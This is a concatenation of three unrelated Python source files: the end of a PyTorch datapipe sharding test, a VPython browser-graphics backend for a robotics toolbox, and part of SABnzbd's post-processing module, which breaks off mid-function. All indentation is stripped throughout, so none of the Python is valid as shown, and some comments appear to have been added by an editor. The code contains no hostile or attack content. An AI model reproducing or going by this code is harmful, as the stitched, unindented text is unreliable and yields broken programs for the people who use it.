torch.utils.data.graph_settings.apply_sharding(sharded_dp, 3, 1)
items = list(sharded_dp)
self.assertEqual([1, 20, 40, 70], items)
all_items = list(self._get_pipeline())
items = []
for i in range(3):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp, 3, i)
items += list(sharded_dp)
self.assertEqual(sorted(all_items), sorted(items))
def test_sharding_length(self):
numbers_dp = dp.iter.IterableWrapper(range(13))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp0, 3, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp1, 3, 1)
sharded_dp2 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp2, 3, 2)
self.assertEqual(13, len(numbers_dp))
self.assertEqual(5, len(sharded_dp0))
self.assertEqual(4, len(sharded_dp1))
self.assertEqual(4, len(sharded_dp2))
numbers_dp = dp.iter.IterableWrapper(range(1))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp0, 2, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp1, 2, 1)
self.assertEqual(1, len(sharded_dp0))
self.assertEqual(0, len(sharded_dp1))
@skipIfNoDill
def test_old_dataloader(self):
dp0 = self._get_pipeline()
expected = list(dp0)
dp0 = self._get_pipeline().sharding_filter()
dl = DataLoader(dp0, batch_size=1, shuffle=False, num_workers=2,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
items = []
for i in dl:
items.append(i)
self.assertEqual(sorted(expected), sorted(items))
if __name__ == '__main__':
run_tests()
|
VPython.py
|
#!/usr/bin/env python
"""
@author Micah Huth
"""
import importlib
import threading
import glob
import os
import platform
import warnings
from time import perf_counter, sleep
import imageio
from roboticstoolbox.backends.Connector import Connector
from roboticstoolbox.robot.DHLink import DHLink  # assumed import path; DHLink is referenced in remove() below
_GraphicsCanvas3D = None
_GraphicsCanvas2D = None
_GraphicalRobot = None
close_localhost_session = None
try:
from roboticstoolbox.backends.VPython.canvas import GraphicsCanvas2D, GraphicsCanvas3D, UImode
from roboticstoolbox.backends.VPython.graphicalrobot import GraphicalRobot
from roboticstoolbox.backends.VPython.grid import GridType
except ImportError:
print(
'\nYou must install the VPython component of the toolbox, do: \n'
'pip install roboticstoolbox[vpython]\n\n')
class VPython(Connector): # pragma nocover
"""
Graphical backend using VPython
VPython is a Python API that connects to a JavaScript/WebGL 3D graphics
engine in a browser tab. It supports many 3D graphical primitives
including meshes, boxes, ellipsoids and lines. It can not render in
full color.
Example:
.. code-block:: python
:linenos:
import roboticstoolbox as rtb
robot = rtb.models.DH.Panda() # create a robot
pyplot = rtb.backends.VPython() # create a VPython backend
pyplot.add(robot) # add the robot to the backend
robot.q = robot.qz # set the robot configuration
pyplot.step() # update the backend and graphical view
:references:
- https://vpython.org
"""
# TODO be able to add ellipsoids (vellipse, fellipse)
# TODO be able add lines (for end-effector paths)
def __init__(self, **kwargs):
"""
Open a localhost session with no canvases
"""
super(VPython, self).__init__()
# Init vars
self.canvases = []
# 2D array of [is_3d, height, width, title, caption, grid, g_type, g_col] per canvas
self.canvas_settings = []
self.robots = []
self._recording = False
self._recording_thread = None
self._recording_fps = None
self._thread_lock = threading.Lock()
self.launch_options = kwargs # save launch options
self._create_empty_session()
def __repr__(self):
s = f"VPython backend, t = {self.sim_time}, scene:"
for robot in self.robots:
s += f"\n {robot.name}"
return s
def launch(
self, **kwargs):
"""
Launch a graphical backend in a browser tab
``env = launch(args)`` creates a 3D scene in a new browser tab as
defined by args, and returns a reference to the backend.
"""
# merge instantiation & launch options
args = {**self.launch_options, **kwargs}
is_3d = args.get('is_3d', True)
height = args.get('height', 500)
width = args.get('width', 888)
title = args.get('title', 'Robotics Toolbox for Python: VPython display')
caption = args.get('caption', '')
grid = args.get('grid', False)
if is_3d:
g_type = args.get('g_type', GridType.XY3D)
else:
g_type = args.get('g_type', GridType.XY2D)
g_col = args.get('g_col', None)
super().launch()
self.canvas_settings.append(
[is_3d, height, width, title, caption, grid, g_type, g_col])
# Create the canvas with the given information
if is_3d:
self.canvases.append(
GraphicsCanvas3D(height, width, title, caption,
grid, g_type, g_col))
else:
self.canvases.append(
GraphicsCanvas2D(height, width, title, caption,
grid, g_type, g_col))
self.sim_time = 0
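# A minimal launch sketch (hedged; the keyword names are the ones read from
# ``args`` above, the values are illustrative only):
#
#   env = VPython()
#   env.launch(is_3d=True, height=600, width=800,
#              title='VPython demo', grid=True)   # opens a new browser tab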
def step(self, dt=None, id=None, q=None, fig_num=0):
"""
Update the graphical scene
:param dt: time step, in seconds; the simulation clock is advanced by this
amount and execution blocks for this interval after the update
:type dt: float, optional
:param id: The Identification of the robot to move. Can be either the
DHRobot or GraphicalRobot
:type id: :class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
:class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param q: The joint angles/configuration of the robot (Optional, if not
supplied will use the stored q values).
:type q: float ndarray(n)
:param fig_num: The canvas index containing the robot to update, defaults to
the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number of
canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.step(args)`` triggers an update of the 3D scene in the browser
window referenced by ``env``.
.. note::
- Each robot in the scene is updated based on
their control type (position, velocity, acceleration, or torque).
- Upon acting, the other three of the four control types will be
updated in the internal state of the robot object.
- The control type is defined by the robot object, and not all
robot objects support all control types.
- Execution is blocked for the specified interval
"""
super().step()
if dt is not None:
    self.sim_time += dt  # dt is optional; only advance the simulation clock when it is given
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If GraphicalRobot given
if isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
id.fkine_and_set(q)
if self.canvases[fig_num].current_mode() == UImode.TEACHPANEL:
# Reload the joint sliders
self.canvases[fig_num].teach_mode(teach=True)
# If DHRobot is given (or equivalent)
else:
graphical_dh_robot = None
# If no ID given, and there are robots available
if id is None and len(self.robots) > 0:
# Obtain the first one
graphical_dh_robot = self.robots[0]
# If no ID, and no robots available
elif id is None:
print("No robot found")
return
else:
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].robot is id and \
self.canvases[fig_num].is_robot_in_canvas(
self.robots[i]):
graphical_dh_robot = self.robots[i]
break
# If no graphical equivalent found, return
if graphical_dh_robot is None:
print("No robot found")
return
# Set poses of graphical robot
graphical_dh_robot.fkine_and_set(q)
if self.canvases[fig_num].current_mode() == UImode.TEACHPANEL:
# Reload the joint sliders
self.canvases[fig_num].teach_mode(teach=True)
if dt is not None:
sleep(dt)
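# A stepping sketch (hedged; assumes a robot has been added with ``add()`` as in
# the class-level example, and that ``qtraj`` is an (m, n) array of joint
# configurations):
#
#   for q in qtraj:
#       env.step(0.05, id=robot, q=q)   # update the view, then block for 50 ms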
def reset(self):
"""
Reset the graphical scene
``env.reset()`` triggers a reset of the 3D scene in the browser window
referenced by ``env``. It is restored to the original state defined by
``launch()``.
"""
super().reset()
if len(self.canvases) > 0:
# Clear localhost
self.canvases[0].scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
# Delete all sessions
self.canvases = []
self._create_empty_session()
for settings in self.canvas_settings:
# Create the canvas with the given information
if settings[0]:
self.canvases.append(GraphicsCanvas3D(
settings[1], settings[2], settings[3],
settings[4], settings[5], settings[6], settings[7]))
else:
self.canvases.append(GraphicsCanvas2D(
settings[1], settings[2], settings[3],
settings[4], settings[5], settings[6], settings[7]))
def restart(self):
"""
Restart the graphics display
``env.restart()`` triggers a restart of the browser view referenced by
``env``. It is closed and relaunched to the original state defined by
``launch()``.
"""
super().restart()
self.reset()
def close(self):
"""
Close the graphics display
``env.close()`` gracefully closes the browser tab
referenced by ``env``.
"""
super().close()
# Close session
if len(self.canvases) > 0:
# if a canvas made
close_localhost_session(self.canvases[0])
else:
# No canvas, so make one
temp = GraphicsCanvas2D()
close_localhost_session(temp)
self.canvases = []
def add(self, dhrobot, fig_num=0, name=None, **kwargs):
"""
Add a robot to the graphical scene
:param dhrobot: The ``DHRobot`` object (if applicable)
:type dhrobot: class:`~roboticstoolbox.robot.DHRobot.DHRobot`, None
:param fig_num: The canvas number to place the robot in
:type fig_num: int
:param name: The name of the robot
:type name: `str`
:raises ValueError: Figure number must be between 0 and number of
figures created
:return: object id within visualizer
:rtype: int
``id = env.add(robot)`` adds the ``robot`` to the graphical
environment.
.. note::
- ``robot`` must be of an appropriate class.
- Adds the robot object to a list of robots which will be updated
when the ``step()`` method is called.
"""
# TODO - name can come from the robot object, maybe an override name?
# Micah: "Name is used from robot class, unless robot is not given"
# TODO - why dhrobot "if applicable"?
# Micah: "It's possible to create a graphical robot
# in VPython not using a robot class."
# TODO - what about other classes of robot?
# Micah: "I use specific parameters in dhrobots.
# If they exist in other robot classes, it should work."
# TODO - what about adding ellipsoids?
super().add()
if name is None:
name = dhrobot.name
# Sanity check input
if fig_num < 0 or fig_num > len(self.canvases) - 1:
raise ValueError(
"Figure number must be between 0 and number "
"of figures created")
# Add robot to canvas
self.robots.append(
GraphicalRobot(self.canvases[fig_num], name, dhrobot))
# self.canvases[fig_num].add_robot(self.robots[len(self.robots)-1])
def remove(self, id, fig_num=0):
"""
Remove a robot from the graphical scene
:param id: The id of the robot to remove. Can be either the DHLink or
GraphicalRobot
:type id: class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param fig_num: The canvas index to delete the robot from, defaults to
the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number
of canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.remove(robot)`` removes the ``robot`` from the graphical
environment.
"""
super().remove()
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If DHLink given
if isinstance(id, DHLink):
robot = None
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].seriallink.equal(id) and \
self.canvases[fig_num].is_robot_in(self.robots[i]):
robot = self.robots[i]
break
if robot is None:
return
else:
self.canvases[fig_num].delete_robot(robot)
# ElseIf GraphicalRobot given
elif isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
self.canvases[fig_num].delete_robot(id)
# Else
else:
raise TypeError("Input must be a DHLink or GraphicalRobot")
def hold(self): # pragma: no cover
'''
hold() keeps the tab open i.e. stops the tab from closing once
the main script has finished.
'''
while True:
pass
def _add_teach_panel(self):
# just need to change the display mode
self.canvases[0].teach_mode(True)
#
# Public non-standard methods
#
def record_start(self, fps, scene_num=0):
"""
Start recording screencaps of a scene
"""
self._thread_lock.acquire()
if not self._recording:
print("VPython Recording...")
if fps > 10:
warnings.warn("The chosen recording fps ({0}) could result in lagging video quality."
"Consider lowering fps and robot speed (e.g. 5fps)".format(fps), RuntimeWarning)
self._recording = True
self._recording_fps = fps
# Spawn a thread
self._recording_thread = threading.Thread(target=self._record_scene, args=(scene_num, fps,))
self._recording_thread.start()
self._thread_lock.release()
def record_stop(self, filename, save_fps=None):
"""
Stop recording screencaps of a scene and combine them into a movie
``save_fps`` may differ from the recording fps; the media file is saved at the given save fps.
"""
#
self._thread_lock.acquire()
if self._recording:
self._recording = False
print("VPython Recording Stopped...")
print("VPython Recording Saving... DO NOT EXIT")
else:
self._thread_lock.release()
return
self._thread_lock.release()
# Wait for thread to finish
self._recording_thread.join()
sleep(3) # Quick sleep to ensure all downloads are done
# (higher framerates can lag behind)
# Get downloads directory
opsys = platform.system()
if opsys == 'Windows': # Windows
path_in = os.path.join(os.getenv('USERPROFILE'), 'downloads')
elif opsys == 'Linux' or opsys == 'Darwin': # Linux / Mac
path_in = os.path.join(os.getenv('HOME'), 'downloads')
else: # Undefined OS
# lets assume 'HOME' for now
path_in = os.path.join(os.getenv('HOME'), 'downloads')
fp_out = filename
fp_in = path_in + "/vpython_*.png"
files = [file for file in glob.glob(fp_in)]
if save_fps is None:
save_fps = self._recording_fps
writer = imageio.get_writer(fp_out, fps=save_fps)
for f in files:
writer.append_data(imageio.imread(f)) # Add it to the video
os.remove(f) # Clean up file
writer.close()
print("VPython Recording Saved... It is safe to exit")
#
# Private Methods
#
@staticmethod
def _create_empty_session():
"""
Create a canvas to ensure the localhost session has been opened.
Then clear the browser tab
"""
# Create a canvas to initiate the connection
temp = GraphicsCanvas3D()
# Delete the canvas to leave a blank screen
temp.scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
def _record_scene(self, scene_num, fps):
"""
Thread-called function to continuously record screenshots
"""
frame_num = 0
if fps <= 0:
raise ValueError("fps must be greater than 0.")
f = 1 / fps
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
while recording:
# Get current time
t_start = perf_counter()
# Take screenshot
filename = "vpython_{:04d}.png".format(frame_num)
self.canvases[scene_num].take_screenshot(filename)
frame_num += 1
# Get current time
t_stop = perf_counter()
# Wait for time of frame to finish
# If saving takes longer than frame frequency, this while is skipped
while t_stop - t_start < f:
t_stop = perf_counter()
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
|
postproc.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.postproc - threaded post-processing of jobs
"""
import os
import logging
import functools
import subprocess
import time
import re
import queue
from typing import List, Optional
import sabnzbd
from sabnzbd.newsunpack import (
unpack_magic,
par2_repair,
external_processing,
sfv_check,
build_filelists,
rar_sort,
is_sfv_file,
)
from threading import Thread
from sabnzbd.misc import on_cleanup_list
from sabnzbd.filesystem import (
real_path,
get_unique_path,
move_to_path,
make_script_path,
long_path,
clip_path,
renamer,
remove_dir,
globber,
globber_full,
set_permissions,
cleanup_empty_directories,
fix_unix_encoding,
sanitize_and_trim_path,
sanitize_files_in_folder,
remove_file,
listdir_full,
setname_from_path,
create_all_dirs,
get_unique_filename,
get_ext,
get_filename,
)
from sabnzbd.nzbstuff import NzbObject
from sabnzbd.sorting import Sorter
from sabnzbd.constants import (
REPAIR_PRIORITY,
FORCE_PRIORITY,
POSTPROC_QUEUE_FILE_NAME,
POSTPROC_QUEUE_VERSION,
sample_match,
JOB_ADMIN,
Status,
VERIFIED_FILE,
)
from sabnzbd.nzbparser import process_single_nzb
import sabnzbd.emailer as emailer
import sabnzbd.downloader
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.encoding as encoding
import sabnzbd.nzbqueue
import sabnzbd.database as database
import sabnzbd.notifier as notifier
import sabnzbd.utils.rarfile as rarfile
import sabnzbd.utils.rarvolinfo as rarvolinfo
import sabnzbd.utils.checkdir
import sabnzbd.deobfuscate_filenames as deobfuscate
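# Give the slow queue a turn after this many consecutive fast-queue jobs (see run() below)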
MAX_FAST_JOB_COUNT = 3
# Match samples
RE_SAMPLE = re.compile(sample_match, re.I)
class PostProcessor(Thread):
""" PostProcessor thread, designed as Singleton """
def __init__(self):
""" Initialize PostProcessor thread """
Thread.__init__(self)
# This history queue is simply used to log what active items to display in the web_ui
self.history_queue: List[NzbObject] = []
self.load()
# Fast-queue for jobs already finished by DirectUnpack
self.fast_queue: queue.Queue[Optional[NzbObject]] = queue.Queue()
# Regular queue for jobs that might need more attention
self.slow_queue: queue.Queue[Optional[NzbObject]] = queue.Queue()
# Load all old jobs
for nzo in self.history_queue:
self.process(nzo)
# So we can always cancel external processes
self.external_process: Optional[subprocess.Popen] = None
# Counter to not only process fast-jobs
self.__fast_job_count = 0
# State variables
self.__stop = False
self.__busy = False
self.paused = False
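# A usage sketch (hedged; in SABnzbd the running instance is normally reached
# through the global ``sabnzbd`` module rather than constructed directly):
#
#   pp = PostProcessor()
#   pp.start()        # Thread.start() -> the run() loop below
#   pp.process(nzo)   # queue a finished NzbObject for post-processing
#   pp.stop()         # finish the current job, then let the thread exit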
def save(self):
""" Save postproc queue """
logging.info("Saving postproc queue")
sabnzbd.save_admin((POSTPROC_QUEUE_VERSION, self.history_queue), POSTPROC_QUEUE_FILE_NAME)
def load(self):
""" Save postproc queue """
logging.info("Loading postproc queue")
data = sabnzbd.load_admin(POSTPROC_QUEUE_FILE_NAME)
if data is None:
return
try:
version, history_queue = data
if POSTPROC_QUEUE_VERSION != version:
logging.warning(T("Old queue detected, use Status->Repair to convert the queue"))
elif isinstance(history_queue, list):
self.history_queue = [nzo for nzo in history_queue if os.path.exists(nzo.download_path)]
except:
logging.info("Corrupt %s file, discarding", POSTPROC_QUEUE_FILE_NAME)
logging.info("Traceback: ", exc_info=True)
def delete(self, nzo_id, del_files=False):
""" Remove a job from the post processor queue """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
if nzo.status in (Status.FAILED, Status.COMPLETED):
nzo.to_be_removed = True
elif nzo.status in (Status.DOWNLOADING, Status.QUEUED):
self.remove(nzo)
nzo.purge_data(delete_all_data=del_files)
logging.info("Removed job %s from postproc queue", nzo.final_name)
nzo.work_name = "" # Mark as deleted job
break
def process(self, nzo: NzbObject):
""" Push on finished job in the queue """
# Make sure we return the status "Waiting"
nzo.status = Status.QUEUED
if nzo not in self.history_queue:
self.history_queue.append(nzo)
# Fast-track if it has DirectUnpacked jobs or if it's still going
if nzo.direct_unpacker and (nzo.direct_unpacker.success_sets or not nzo.direct_unpacker.killed):
self.fast_queue.put(nzo)
else:
self.slow_queue.put(nzo)
self.save()
sabnzbd.history_updated()
def remove(self, nzo: NzbObject):
""" Remove given nzo from the queue """
try:
self.history_queue.remove(nzo)
except:
pass
self.save()
sabnzbd.history_updated()
def stop(self):
""" Stop thread after finishing running job """
self.__stop = True
self.slow_queue.put(None)
self.fast_queue.put(None)
def cancel_pp(self, nzo_id):
""" Change the status, so that the PP is canceled """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
nzo.abort_direct_unpacker()
if nzo.pp_active:
nzo.pp_active = False
try:
# Try to kill any external running process
self.external_process.kill()
logging.info("Killed external process %s", self.external_process.args[0])
except:
pass
return True
return None
def empty(self):
""" Return True if pp queue is empty """
return self.slow_queue.empty() and self.fast_queue.empty() and not self.__busy
def get_queue(self):
""" Return list of NZOs that still need to be processed """
return [nzo for nzo in self.history_queue if nzo.work_name]
def get_path(self, nzo_id):
""" Return download path for given nzo_id or None when not found """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
return nzo.download_path
return None
def run(self):
""" Postprocessor loop """
# First we do a dircheck
complete_dir = sabnzbd.cfg.complete_dir.get_path()
if sabnzbd.utils.checkdir.isFAT(complete_dir):
logging.warning_helpful(
T("Completed Download Folder %s is on FAT file system, limiting maximum file size to 4GB")
% complete_dir
)
else:
logging.info("Completed Download Folder %s is not on FAT", complete_dir)
# Start looping
check_eoq = False
while not self.__stop:
self.__busy = False
if self.paused:
time.sleep(5)
continue
# Set NzbObject object to None so references from this thread do not keep the
# object alive until the next job is added to post-processing (see #1628)
nzo = None
# Something in the fast queue?
try:
# Every few fast jobs we should allow a
# slow job so that the slow ones don't wait forever
if self.__fast_job_count >= MAX_FAST_JOB_COUNT and self.slow_queue.qsize():
raise queue.Empty
nzo = self.fast_queue.get(timeout=2)
self.__fast_job_count += 1
except queue.Empty:
# Try the slow queue
try:
nzo = self.slow_queue.get(timeout=2)
# Reset fast-counter
self.__fast_job_count = 0
except queue.Empty:
# Check for empty queue
if check_eoq:
check_eoq = False
handle_empty_queue()
# No fast or slow jobs, better luck next loop!
continue
# Stop job
if not nzo:
continue
# Job was already deleted.
if not nzo.work_name:
check_eoq = True
continue
# Flag NZO as being processed
nzo.pp_active = True
# Pause downloader, if the user wants that
if cfg.pause_on_post_processing():
sabnzbd.Downloader.wait_for_postproc()
self.__busy = True
process_job(nzo)
if nzo.to_be_removed:
with database.HistoryDB() as history_db:
history_db.remove_history(nzo.nzo_id)
nzo.purge_data()
# Processing done
nzo.pp_active = False
self.remove(nzo)
self.external_process = None
check_eoq = True
# Allow download to proceed
sabnzbd.Downloader.resume_from_postproc()
def process_job(nzo: NzbObject):
""" Process one job """
start = time.time()
# keep track of whether we can continue
all_ok = True
# keep track of par problems
par_error = False
# keep track of any unpacking errors
unpack_error = False
# Signal empty download, for when 'empty_postproc' is enabled
empty = False
nzb_list = []
# These need to be initialized in case of a crash
workdir_complete = ""
script_log = ""
script_line = ""
# Get the job flags
nzo.save_attribs()
flag_repair, flag_unpack, flag_delete = nzo.repair_opts
# Normalize PP flags: delete implies unpack, and unpack implies repair
if flag_delete:
flag_unpack = True
if flag_unpack:
flag_repair = True
# Get the NZB name
filename = nzo.final_name
# Download-processes can mark job as failed, skip all steps
if nzo.fail_msg:
all_ok = False
par_error = True
unpack_error = 1
try:
# Get the folder containing the download result
workdir = nzo.download_path
tmp_workdir_complete = None
# if no files are present (except __admin__), fail the job
if all_ok and len(globber(workdir)) < 2:
if nzo.precheck:
_, ratio = nzo.check_availability_ratio()
emsg = T("Download might fail, only %s of required %s available") % (ratio, cfg.req_completion_rate())
else:
emsg = T("Download failed - Not on your server(s)")
empty = True
emsg += " - https://sabnzbd.org/not-complete"
nzo.fail_msg = emsg
nzo.set_unpack_info("Download", emsg)
nzo.status = Status.FAILED
# do not run unpacking or parity verification
flag_repair = flag_unpack = False
all_ok = cfg.empty_postproc() and empty
if not all_ok:
par_error = True
unpack_error = 1
script = nzo.script
logging.info(
"Starting Post-Processing on %s => Repair:%s, Unpack:%s, Delete:%s, Script:%s, Cat:%s",
filename,
flag_repair,
flag_unpack,
flag_delete,
script,
nzo.cat,
)
# Set complete dir to workdir in case we need to abort
workdir_complete = workdir
# Send post-processing notification
notifier.send_notification(T("Post-processing"), nzo.final_name, "pp", nzo.cat)
# Par processing, if enabled
if all_ok and flag_repair:
par_error, re_add = parring(nzo, workdir)
if re_add:
# Try to get more par files
return False
# If we don't need extra par2, we can disconnect
if sabnzbd.NzbQueue.actives(grabs=False) == 0 and cfg.autodisconnect():
# This was the last job, close server connections
sabnzbd.Downloader.disconnect()
# Sanitize the resulting files
if sabnzbd.WIN32:
sanitize_files_in_folder(workdir)
# Check if user allows unsafe post-processing
if flag_repair and cfg.safe_postproc():
all_ok = all_ok and not par_error
if all_ok:
# Fix encodings
fix_unix_encoding(workdir)
# Use dirs generated by direct-unpacker
if nzo.direct_unpacker and nzo.direct_unpacker.unpack_dir_info:
(
tmp_workdir_complete,
workdir_complete,
file_sorter,
one_folder,
marker_file,
) = nzo.direct_unpacker.unpack_dir_info
else:
# Generate extraction path
tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = prepare_extraction_path(
nzo
)
newfiles = []
# Run Stage 2: Unpack
if flag_unpack:
# Set the current nzo status to "Extracting...". Used in History
nzo.status = Status.EXTRACTING
logging.info("Running unpack_magic on %s", filename)
unpack_error, newfiles = unpack_magic(
nzo, workdir, tmp_workdir_complete, flag_delete, one_folder, (), (), (), (), ()
)
logging.info("Unpacked files %s", newfiles)
if sabnzbd.WIN32:
# Sanitize the resulting files
newfiles = sanitize_files_in_folder(tmp_workdir_complete)
logging.info("Finished unpack_magic on %s", filename)
if cfg.safe_postproc():
all_ok = all_ok and not unpack_error
if all_ok:
# Move any (left-over) files to destination
nzo.status = Status.MOVING
nzo.set_action_line(T("Moving"), "...")
for root, _dirs, files in os.walk(workdir):
if not root.endswith(JOB_ADMIN):
for file_ in files:
path = os.path.join(root, file_)
new_path = path.replace(workdir, tmp_workdir_complete)
ok, new_path = move_to_path(path, new_path)
if new_path:
newfiles.append(new_path)
if not ok:
nzo.set_unpack_info("Unpack", T("Failed moving %s to %s") % (path, new_path))
all_ok = False
break
# Set permissions right
set_permissions(tmp_workdir_complete)
if all_ok and marker_file:
del_marker(os.path.join(tmp_workdir_complete, marker_file))
remove_from_list(marker_file, newfiles)
if all_ok:
# Remove files matching the cleanup list
cleanup_list(tmp_workdir_complete, skip_nzb=True)
# Check if this is an NZB-only download, if so redirect to queue
# except when PP was Download-only
if flag_repair:
nzb_list = nzb_redirect(tmp_workdir_complete, nzo.final_name, nzo.pp, script, nzo.cat, nzo.priority)
else:
nzb_list = None
if nzb_list:
nzo.set_unpack_info("Download", T("Sent %s to queue") % nzb_list)
cleanup_empty_directories(tmp_workdir_complete)
else:
# Full cleanup including nzb's
cleanup_list(tmp_workdir_complete, skip_nzb=False)
script_output = ""
script_ret = 0
if not nzb_list:
# Give destination its final name
if cfg.folder_rename() and tmp_workdir_complete and not one_folder:
if not all_ok:
# Rename failed folders so they are easy to recognize
workdir_complete = tmp_workdir_complete.replace("_UNPACK_", "_FAILED_")
workdir_complete = get_unique_path(workdir_complete, create_dir=False)
try:
newfiles = rename_and_collapse_folder(tmp_workdir_complete, workdir_complete, newfiles)
except:
logging.error(
T('Error renaming "%s" to "%s"'),
clip_path(tmp_workdir_complete),
clip_path(workdir_complete),
)
logging.info("Traceback: ", exc_info=True)
# Better disable sorting because filenames are all off now
file_sorter.sort_file = None
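            # Encode the overall result that is passed to the user script:
            # 0 = success, 1 = par error, 2 = unpack error, 3 = both, -1 = empty download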
if empty:
job_result = -1
else:
job_result = int(par_error) + int(bool(unpack_error)) * 2
if cfg.ignore_samples():
remove_samples(workdir_complete)
# TV/Movie/Date Renaming code part 2 - rename and move files to parent folder
if all_ok and file_sorter.sort_file:
if newfiles:
file_sorter.rename(newfiles, workdir_complete)
workdir_complete, ok = file_sorter.move(workdir_complete)
else:
workdir_complete, ok = file_sorter.rename_with_ext(workdir_complete)
if not ok:
nzo.set_unpack_info("Unpack", T("Failed to move files"))
all_ok = False
if cfg.deobfuscate_final_filenames() and all_ok and not nzb_list:
# Deobfuscate the filenames
logging.info("Running deobfuscate")
deobfuscate.deobfuscate_list(newfiles, nzo.final_name)
# Run the user script
script_path = make_script_path(script)
if (all_ok or not cfg.safe_postproc()) and (not nzb_list) and script_path:
# Set the current nzo status to "Ext Script...". Used in History
nzo.status = Status.RUNNING
nzo.set_action_line(T("Running script"), script)
nzo.set_unpack_info("Script", T("Running user script %s") % script, unique=True)
script_log, script_ret = external_processing(
script_path, nzo, clip_path(workdir_complete), nzo.final_name, job_result
)
script_line = get_last_line(script_log)
if script_log:
script_output = nzo.nzo_id
if script_line:
nzo.set_unpack_info("Script", script_line, unique=True)
else:
nzo.set_unpack_info("Script", T("Ran %s") % script, unique=True)
else:
script = ""
script_line = ""
script_ret = 0
        # A bad script exit status may be configured to fail the job
if script_ret and cfg.script_can_fail():
script_error = True
all_ok = False
nzo.fail_msg = T("Script exit code is %s") % script_ret
else:
script_error = False
# Email the results
if (not nzb_list) and cfg.email_endjob():
if (cfg.email_endjob() == 1) or (cfg.email_endjob() == 2 and (unpack_error or par_error or script_error)):
emailer.endjob(
nzo.final_name,
nzo.cat,
all_ok,
workdir_complete,
nzo.bytes_downloaded,
nzo.fail_msg,
nzo.unpack_info,
script,
script_log,
script_ret,
)
if script_output:
# Can do this only now, otherwise it would show up in the email
if script_ret:
script_ret = "Exit(%s) " % script_ret
else:
script_ret = ""
if len(script_log.rstrip().split("\n")) > 1:
nzo.set_unpack_info(
"Script",
'%s%s <a href="./scriptlog?name=%s">(%s)</a>'
% (script_ret, script_line, encoding.xml_name(script_output), T("More")),
unique=True,
)
else:
# No '(more)' button needed
nzo.set_unpack_info("Script", "%s%s " % (script_ret, script_line), unique=True)
# Cleanup again, including NZB files
if all_ok:
cleanup_list(workdir_complete, False)
# Force error for empty result
all_ok = all_ok and not empty
# Update indexer with results
if cfg.rating_enable():
if nzo.encrypted > 0:
sabnzbd.Rating.update_auto_flag(nzo.nzo_id, sabnzbd.Rating.FLAG_ENCRYPTED)
if empty:
hosts = [s.host for s in sabnzbd.Downloader.nzo_servers(nzo)]
if not hosts:
hosts = [None]
for host in hosts:
sabnzbd.Rating.update_auto_flag(nzo.nzo_id, sabnzbd.Rating.FLAG_EXPIRED, host)
except:
logging.error(T("Post Processing Failed for %s (%s)"), filename, T("see logfile"))
logging.info("Traceback: ", exc_info=True)
nzo.fail_msg = T("Post-processing was aborted")
notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
nzo.status = Status.FAILED
par_error = True
all_ok = False
if cfg.email_endjob():
emailer.endjob(
nzo.final_name,
nzo.cat,
all_ok,
clip_path(workdir_complete),
nzo.bytes_downloaded,
nzo.fail_msg,
nzo.unpack_info,
"",
"",
0,
)
if all_ok:
# If the folder only contains one file OR folder, have that as the path
# Be aware that series/generic/date sorting may move a single file into a folder containing other files
workdir_complete = one_file_or_folder(workdir_complete)
workdir_complete = os.path.normpath(workdir_complete)
# Clean up the NZO data
try:
nzo.purge_data(delete_all_data=all_ok)
except:
logging.error(T("Cleanup of %s failed."), nzo.final_name)
logging.info("Traceback: ", exc_info=True)
# Use automatic retry link on par2 errors and encrypted/bad RARs
if par_error or unpack_error in (2, 3):
try_alt_nzb(nzo)
# Check if it was aborted
if not nzo.pp_active:
nzo.fail_msg = T("Post-processing was aborted")
all_ok = False
# Show final status in history
if all_ok:
